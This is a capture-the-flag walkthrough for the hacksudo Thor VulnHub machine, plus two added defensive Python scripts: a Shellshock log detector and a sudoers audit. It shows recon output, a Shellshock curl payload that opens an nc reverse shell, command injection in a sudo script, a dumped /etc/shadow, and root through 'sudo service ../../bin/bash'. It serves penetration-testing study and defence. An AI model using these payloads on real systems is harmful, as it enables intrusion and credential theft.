Target machine practice: hacksudo---Thor
Target download: http://download.vulnhub.com/hacksudo/hacksudo---Thor.zip
MD5 checksum: d1216820513fd7f96bca40c1459861c2
SHA1 checksum: 70b7fb9a523ba559d3437cd1f0ae7f1cdbd77578
- Verify from cmd:
certutil -hashfile <file path> EncryptionType
- Verify from PowerShell:
Get-FileHash <file path> -Algorithm EncryptionType | Format-List
- EncryptionType is the hash algorithm: SHA1, MD5
Use VirtualBox
Network: Host-Only
- kali: NAT + [ Bridged/Host-Only ]
- arp-scan
- nmap
- netdiscover
- fping
Initial scan: sudo arp-scan -l -I eth1

```
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1
[sudo] kali 的密码:
Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4:
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
0a:00:27:00:00:0d (Unknown: locally administered)
08:00:27:bf:0e:ee PCS Systemtechnik GmbH
08:00:27:56:af:01 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.182 seconds (117.32 hosts/sec). 3 responded
```
Port-scan the discovered IP with nmap: nmap -A -T4

```
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-02 20:35 CST
Nmap scan report for
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA)
|   256 349a57607d6670d5b5ff4796e0362375 (ECDSA)
|_  256 ae7deefe1dbc994d54453d6116f86c87 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.66 seconds
```

22/tcp is the classic SSH service, and 80/tcp
is likewise the classic HTTP service - the OS is Debian
The page contains two pieces of JavaScript code:

```javascript
function respFunc() {
    var x = document.getElementById("theTopNav");
    console.log(x);
    if (x.className === "topnav") {
        x.className += " responsive";
        return 0;
    }
    if (x.className === "topnav navbar-fixed") {
        x.className += " responsive";
        return 0;
    }
    if (x.className === "topnav responsive") {
        x.className = "topnav";
        return 0;
    }
    if (x.className === "topnav navbar-fixed responsive" || x.className === "topnav responsive navbar-fixed") {
        x.className = "topnav navbar-fixed";
        return 0;
    }
}

// Function below is jquery-3 function used for making the navbar sticky
$(document).ready(function() {
    $(window).scroll(function () {
        if ($(window).scrollTop() > 120) {
            $("#theTopNav").addClass('navbar-fixed');
        }
        if ($(window).scrollTop() < 121) {
            $("#theTopNav").removeClass('navbar-fixed');
        }
    });
});

var old_time = 0;
var count = 1;
var eEgg_flag = false;
var modal = document.getElementById('eEgg_modal');
var footer = document.getElementById('footer');

function eEgg_func() {
    var d = new Date();
    var n = d.getTime();
    var new_time = Math.ceil(n / 1000);
    if ((new_time - old_time) <= 1) {
        count++;
    } else {
        count = 1;
    }
    old_time = new_time;
    if (count > 7 && !eEgg_flag) {
        modal.style.display = "block";
        eEgg_flag = true;
        // Timeout
        setTimeout(function () {
            modal.style.display = "none";
        }, 21000);
        // Timeout text display in the footer
        var now = new Date().getTime();
        var countDownDate = now + 21000;
        setInterval(function() {
            // Get today's date and time
            var now = new Date().getTime();
            // Find the distance between now and the count down date
            var distance = countDownDate - now;
            // Time calculations for seconds
            var seconds = Math.floor((distance % (1000 * 60)) / 1000);
            // Display the result in the footer element
            document.getElementById("footer").innerHTML = "Going back in " + seconds + "s...";
        }, 1000);
    }
}
```

- It does simple checks on the login page content
The source also contains a comment suggesting that this page uses CGI: <!-- cgi-bin ---!>
- CGI is the specification for external programs run by a web server; programs written to CGI can extend the server's functionality
- A CGI application can interact with the browser, and can also communicate with external data sources such as a database server through a database API, fetching data from the database server
- So there should be a
Nothing else of interest, so next we continue with directory brute-forcing: dirsearch -u

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/

Error Log: /home/kali/.dirsearch/logs/errors-22-12-02_21-02-33.log

Target:

[21:02:33] Starting:
[21:02:36] 403 -  279B  - /.ht_wsr.txt
...
...
[21:02:38] 403 -  279B  - /.php
[21:02:46] 200 -    4KB - /README.md
[21:03:06] 200 -    1KB - /admin_login.php
[21:03:09] 302 -    7KB - /admin_home.php  ->  home.php
[21:03:29] 403 -  279B  - /cgi-bin/
[21:03:35] 200 -    4KB - /contact.php
[21:03:51] 301 -  316B  - /fonts  ->
[21:03:54] 200 -  472B  - /header.php
[21:03:56] 200 -    5KB - /home.php
[21:03:58] 200 -    4KB - /images/
[21:03:58] 301 -  317B  - /images  ->
[21:04:00] 200 -    5KB - /index.php
[21:04:00] 200 -    5KB - /index.php/login/
[21:04:26] 200 -    8KB - /news.php
[21:04:59] 403 -  279B  - /server-status
[21:05:00] 403 -  279B  - /server-status/

Task Completed
```
- An interesting file, the README:

## Disclaimer

<b><i>This project should not be modified in any way and used anywhere else without my permission.</i></b>

If you use this project for phishing purposes after modifying the source code / or by any other means, remember that the original project has nothing to do with phishing or any other malicious purpose. Any loss of data or unauthorized access which happened because of such phishing kits would not be my responsibility as that is not my original code. Strict legal action would be taken if someone is found modifying it and using it for any unethical purpose.

# Online Banking System

A web based banking system with all essential features and security accompanied by a beautiful and simple website. The website is designed in accordance with google material design and responsive web design guidelines to ensure a seamless experience between devices. A fictional name of "Dolphin Bank" has been used only for representative purposes.

## Built with

<b>HTML5, CSS, JavaScript</b> & <b>jQuery</b> used for front-end design.
<b>PHP7 & MySQL</b> used for back-end design.
<b>Oracle MySQL</b> has been used to create and host the database for the internet banking website.
Other than the languages/tools mentioned above <b>no</b> other/external libraries and/or web-page templates have been used, everything has been coded from ground-up straight from scratch.

## How to build/use

Setup an environment which supports web development like <b>LAMP</b> on <b>Linux</b> systems OR install <b>WampServer/XAMPP</b> or anything similar on <b>Windows</b>.
Copy the folder [net-banking](https://github.com/zakee94/online-banking-system/tree/master/net-banking) or the files in it to the location of the localhost. For example "/var/www/html", the location of localhost in Ubuntu.
Import the [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql) database into your MySQL setup.
Edit the file [connect.php](https://github.com/zakee94/online-banking-system/blob/master/net-banking/connect.php) and give proper username and password of your MySQL setup.
Open a browser and test whether the setup works or not by visiting the home page. Type "localhost/home.php" as the URL in the browser to visit the home page.
All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql](https://github.com/zakee94/online-banking-system/blob/master/net_banking.sql). However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".

Some useful links to help in proper setup :
* [Installing LAMP](https://www.digitalocean.com/community/tutorials/how-to-install-linux-apache-mysql-php-lamp-stack-on-ubuntu-14-04)
* [WampServer](http://www.wampserver.com/en/)
* [Importing database in MySQL](https://www.digitalocean.com/community/tutorials/how-to-import-and-export-databases-and-reset-a-root-password-in-mysql)

## Details about the project

An exhaustive list of features, documentation, design hierarchy, details about the web pages, database, design characteristics/features and a lot more can be found [here](https://drive.google.com/open?id=1Px2shjcmyLUv7-u5wp93HvKT_zvw-Pmk). The ER Diagram can also be found on the link given above or can be viewed [here](https://drive.google.com/open?id=1Tn2fBR9IjLP8dlv6svrc4aEvryrYcI3G).

## Description of the various folders

- <b>/net-banking :</b> Contains the source code of the website
- <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website
- <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website

## Screenshots

(more can be found [here](https://drive.google.com/open?id=1bLLNyEiVGoWgHDfOehGooYSAZUNtj85F))

## Authors

* [zakee94](https://github.com/zakee94/)
Technologies used: HTML5, CSS, JavaScript, jQuery, PHP7, MySQL, Oracle MySQL
This important file states: All the passwords and the usernames of both the admin and the customer can be found in the database i.e. in the file [net_banking.sql] However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".
We also find that this application does not restrict directory listings (Index of)
## Description of the various folders
- <b>/net-banking :</b> Contains the source code of the website
- <b>/net-banking/images :</b> Contains various images and icon vectors used as resources in the website
- <b>/net-banking/fonts :</b> Contains various fonts(.ttf files) used in the website
- The net-banking directory
- net_banking.sql: the database imported into the MySQL setup; all admin and customer usernames and passwords can be found in it
- connect.php
- Account and password information
In /admin_login.php
there is an obvious SQL injection vulnerability: http://
This directly yields the four accounts' details, and it also has an obvious SQL injection vulnerability - combined with
the SQL layout in it the attack works even better, but for now we don't need it since we are already admin. Below is a fragment of net_banking.sql:

```sql
INSERT INTO `customer` VALUES
(1,'Nafees','Zakee','male','1994-11-28',123456789,'zakee.nafees@gmail.com','+91 8918722499','22/10, Secondary Road, Durgapur - 713204','delhi',1122334455,1234,'zakee94','nafees123'),
(2,'Md Salman','Ali','male','1994-10-11',987654321,'ali.salman@gmail.com','+966 895432167','Al Ahsa Street Malaz, King Abdulaziz Rd, Alamal Dist. RIYADH 12643-2121.','riyadh',1133557788,1234,'salman','salman123'),
(3,'Tushar','Kr. Pandey','male','1995-02-03',125656765,'tusharpkt@gmail.com','+334 123456987','Champ de Mars, \r\n5 Avenue Anatole France, \r\n75007 Paris, France','paris',1122338457,1357,'tushar','tushar123'),
(4,'Jon','Snow','male','1985-02-03',129156787,'jon.snow@gmail.com','+1 8918332797','The Night Watch,\r\nKing in the North,\r\nThe North Remembers,\r\nWesteros.','newyork',1233556739,1234,'jon','snow123');
```
Next, we go back to /cgi-bin/
and brute-force it with dirsearch -u -f -e cgi,sh

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u -f -e cgi,sh

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: cgi, sh | HTTP method: GET | Threads: 30 | Wordlist size: 16514

Output File: /home/kali/.dirsearch/reports/

Error Log: /home/kali/.dirsearch/logs/errors-22-12-02_22-05-06.log

Target:

[22:05:07] Starting:
[22:05:11] 403 -  279B  - /cgi-bin/.ht_wsr.txt
[22:05:11] 403 -  279B  - /cgi-bin/.htaccess.bak1
[22:05:11] 403 -  279B  - /cgi-bin/.htaccess.save
[22:05:11] 403 -  279B  - /cgi-bin/.htaccess.orig
[22:05:11] 403 -  279B  - /cgi-bin/.htaccess.sample
[22:05:11] 403 -  279B  - /cgi-bin/.htpasswds
[22:05:11] 403 -  279B  - /cgi-bin/.htaccess_extra
[22:05:11] 403 -  279B  - /cgi-bin/.htaccessOLD2
[22:05:11] 403 -  279B  - /cgi-bin/.htpasswd_test
[22:05:11] 403 -  279B  - /cgi-bin/.htaccess_sc
[22:05:11] 403 -  279B  - /cgi-bin/.htaccessOLD
[22:05:11] 403 -  279B  - /cgi-bin/.html
[22:05:11] 403 -  279B  - /cgi-bin/.htaccessBAK
[22:05:11] 403 -  279B  - /cgi-bin/.httr-oauth
[22:05:11] 403 -  279B  - /cgi-bin/.htaccess_orig
[22:05:11] 403 -  279B  - /cgi-bin/.htm
[22:05:14] 403 -  279B  - /cgi-bin/.php
[22:06:32] 500 -  612B  - /cgi-bin/backup.cgi
[22:08:56] 500 -  612B  - /cgi-bin/shell.sh

Task Completed
```
We use nmap to verify our idea: nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls

```
┌──(kali㉿kali)-[~]
└─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls    1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-02 22:15 CST
Nmap scan report for
Host is up (0.00090s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     Exploit results:
|   <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|   <html><head>
|   <title>500 Internal Server Error</title>
|   </head><body>
|   <h1>Internal Server Error</h1>
|   <p>The server encountered an internal error or
|   misconfiguration and was unable to complete
|   your request.</p>
|   <p>Please contact the server administrator at
|    webmaster@localhost to inform them of the time this error occurred,
|    and the actions you performed just before this error.</p>
|   <p>More information about this error may be available
|   in the server error log.</p>
|   <hr>
|   <address>Apache/2.4.38 (Debian) Server at  Port 80</address>
|   </body></html>
|
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds
```

- The presence of the Shellshock vulnerability is confirmed
- Testing
also shows it is present - the exploitation method is also given above
We use curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'"

```
┌──(kali㉿kali)-[~]
└─$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'"
/usr/bin/nc
```

- It really is there
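From the defender's side, the same header pattern the nmap script and the curl test above rely on is what a log monitor should alert on. The following Python detector is an added example, not part of the original walkthrough: it parses Apache combined-format access logs and flags requests whose User-Agent, Referer or request line carries the bash function prelude. The log lines are constructed, with 192.0.2.x placeholder addresses.

```python
import re
from typing import Dict, List

# Apache "combined" LogFormat: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Bash exported-function prelude "() {" that CVE-2014-6271 abuses: mod_cgi copies request
# headers into environment variables, and an unpatched bash executed whatever followed the prelude.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def parse_combined(line: str) -> Dict[str, str]:
    """Return the named fields of one combined-format line, or {} if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else {}

def is_shellshock_attempt(entry: Dict[str, str]) -> bool:
    """True if any client-controlled field that reaches the CGI environment carries the prelude."""
    return any(SHELLSHOCK_RE.search(entry.get(f, "")) for f in ("agent", "referer", "request"))

def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return host/request/status for every line that looks like a Shellshock probe."""
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry and is_shellshock_attempt(entry):
            hits.append({"host": entry["host"], "request": entry["request"], "status": entry["status"]})
    return hits

# Constructed sample log: two probes (one via User-Agent, one via Referer) and two benign requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Dec/2022:22:20:01 +0800] "GET /cgi-bin/backup.cgi HTTP/1.1" 500 612 "-" '
    '"() { :; }; echo; echo; /bin/bash -c \'which nc\'"',
    '192.0.2.10 - - [02/Dec/2022:22:20:05 +0800] "GET /cgi-bin/shell.sh HTTP/1.1" 500 612 '
    '"() { :; }; echo; echo; /bin/bash -c \'which nc\'" "curl/7.85.0"',
    '192.0.2.20 - - [02/Dec/2022:22:21:09 +0800] "GET /home.php HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.20 - - [02/Dec/2022:22:21:12 +0800] "GET /cgi-bin/backup.cgi HTTP/1.1" 500 612 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"shellshock probe from {hit['host']}: {hit['request']} -> {hit['status']}")
```

A 500 on a /cgi-bin/ path alone is not a signal (the benign fourth line gets one too); the prelude in a client-supplied field is.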
First start a listener: nc -nvlp 4444
Then use curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 4444'"

```
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 33482
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Upgrade the shell with python3 -c 'import pty;pty.spawn("/bin/bash")'
First check the sudo configuration: sudo -l

```
bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on HackSudoThor:
    (thor) NOPASSWD: /home/thor/./hammer.sh
```
- We can run it unconditionally
with the parameter /home/thor/./hammer.sh

```
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key :
```

- It requires input

```
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key : id
id
Hey Dear ! I am id , Please enter your Secret massage : id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Thank you for your precious time!
bash-4.3$
```
- We find that the second input is executed as a command
- And the command runs as thor
So if we replace the id
we ran with bash
we get a shell as thor

```
HELLO want to talk to Thor?
id
bash
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
python3 -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/usr/lib/cgi-bin$
```
Check thor's sudo configuration

```
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thor may run the following commands on HackSudoThor:
    (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
```

- We find two commands runnable as root:
/usr/bin/cat, /usr/sbin/service
With these we can read /etc/shadow
```
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:$6$1YV0h.2rYTAvcB.o$cLPgAevmbnBo8dtADheWYcIfGLg157gfrCzZsKqv268MDkimBW7JcnQK6sI79fXsa1Hm5GmP8Kni05w.2nJfc0:18838:0:99999:7:::
daemon:*:18789:0:99999:7:::
bin:*:18789:0:99999:7:::
sys:*:18789:0:99999:7:::
sync:*:18789:0:99999:7:::
games:*:18789:0:99999:7:::
man:*:18789:0:99999:7:::
lp:*:18789:0:99999:7:::
mail:*:18789:0:99999:7:::
news:*:18789:0:99999:7:::
uucp:*:18789:0:99999:7:::
proxy:*:18789:0:99999:7:::
www-data:*:18789:0:99999:7:::
backup:*:18789:0:99999:7:::
list:*:18789:0:99999:7:::
irc:*:18789:0:99999:7:::
gnats:*:18789:0:99999:7:::
nobody:*:18789:0:99999:7:::
_apt:*:18789:0:99999:7:::
systemd-timesync:*:18789:0:99999:7:::
systemd-network:*:18789:0:99999:7:::
systemd-resolve:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
messagebus:*:18789:0:99999:7:::
sshd:*:18789:0:99999:7:::
mysql:!:18790:0:99999:7:::
ftpuser:!:18793:0:99999:7:::
thor:$6$W4fXVS7OotxxqyVR$VP6iBANtcJIBt5.eI6qHFH1ho.xTtsISGiKj2uRkc.DH1NfPw54FImt28S8rKpn0PhlfHL3VYSAVNmZWws98X1:18838:0:99999:7:::
thor@HacksudoThor:/usr/lib/cgi-bin$
```

- We can see the root password hash directly; we could crack it, but that is slow
In fact /usr/sbin/service
is the fatal one: we use sudo service ../../bin/bash

```
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo service ../../bin/bash
sudo service ../../bin/bash
bash-4.3# id
id
uid=0(root) gid=0(root) groups=0(root)
```

And with that it is done. GAME OVER
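Both privilege steps on this box came from sudoers grants rather than software bugs, so the fix is a configuration review. As an added example (not part of the original walkthrough), this Python audit parses `sudo -l` output like the two results above and flags the grants that mattered here: a NOPASSWD root grant to an unrestricted binary that reads or launches arbitrary paths, and a NOPASSWD grant to a script living in a user's home directory. The inputs are constructed copies of the page's two outputs, and the risky-binary table is an assumption limited to what this box showed.

```python
import re
from typing import Dict, List

# NOPASSWD root grants with no argument restriction that undo the rule's purpose. Both
# entries are the grants seen on this box (assumption: extend the table for your own hosts).
RISKY_UNRESTRICTED = {
    "/usr/bin/cat": "reads any file as root, /etc/shadow included",
    "/usr/sbin/service": "runs whatever init-script path it is handed, relative paths included",
}
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(output: str) -> List[Dict]:
    """Turn the privilege section of `sudo -l` output into one dict per command."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t for t in m.group("tags").replace(" ", "").split(":") if t}
        for cmd in m.group("cmds").split(","):
            parts = cmd.split()
            if parts:  # skip an empty entry left by a trailing comma
                rules.append({"runas": m.group("runas"), "tags": tags, "path": parts[0], "args": parts[1:]})
    return rules

def audit(rules: List[Dict]) -> List[str]:
    """Flag NOPASSWD grants of a risky unrestricted binary as root, or of a script in a home directory."""
    findings = []
    for r in rules:
        path = r["path"]
        if "NOPASSWD" not in r["tags"]:
            continue
        if r["runas"] in ("root", "ALL") and not r["args"] and path in RISKY_UNRESTRICTED:
            findings.append(f"{path} as root, any arguments: {RISKY_UNRESTRICTED[path]}")
        elif path.startswith(("/home/", "/tmp/")):
            findings.append(f"{path} as {r['runas']}: script lives in a user-controlled directory")
    return findings

# Constructed copies of the two sudo -l results shown in this walkthrough.
WWW_DATA_SUDO_L = "User www-data may run the following commands on HackSudoThor:\n    (thor) NOPASSWD: /home/thor/./hammer.sh\n"
THOR_SUDO_L = "User thor may run the following commands on HackSudoThor:\n    (root) NOPASSWD: /usr/bin/cat, /usr/sbin/service\n"

if __name__ == "__main__":
    for user, text in (("www-data", WWW_DATA_SUDO_L), ("thor", THOR_SUDO_L)):
        for finding in audit(parse_sudo_l(text)):
            print(f"[{user}] {finding}")
```

A grant that pins the arguments (for example `/usr/sbin/service apache2 restart`) passes the audit, which is the shape a least-privilege sudoers entry should take.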
